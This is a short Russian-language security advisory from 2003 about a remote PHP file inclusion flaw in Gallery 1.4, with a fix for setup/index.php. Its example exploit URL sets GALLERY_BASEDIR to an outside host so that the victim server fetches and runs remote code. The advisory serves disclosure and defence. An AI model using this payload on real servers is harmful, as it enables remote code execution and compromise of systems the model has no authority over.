Security Lab

Выполнение произвольного PHP кода в Gallery

Дата публикации:13.10.2003
Всего просмотров:1432
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Gallery 1.4

Описание: Уязвимость обнаружена в Gallery. Удаленный атакующий может выполнить произвольный PHP код на уязвимом сервере.

Переменная GALLERY_BASEDIR в сценарии index.php включает сценарий util.php, не проверяя его фактическое местоположение. В результате удаленный атакующий может включить произвольный PHP код, расположенный на удаленном сервере, который будет выполнен на уязвимом сервере с привилегиями Web сервера.

Пример/Эксплоит:

http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
где 
http://tester/util.php

URL производителя:

Решение: Внесите следующее исправление в сценарий index.php в каталоге setup:

if (!isset($GALLERY_BASEDIR)) {
$GALLERY_BASEDIR = '../';
}
<pre>
На 
<pre>
$GALLERY_BASEDIR = '../';
Ссылки: Gallery 1.4 including file vulnerability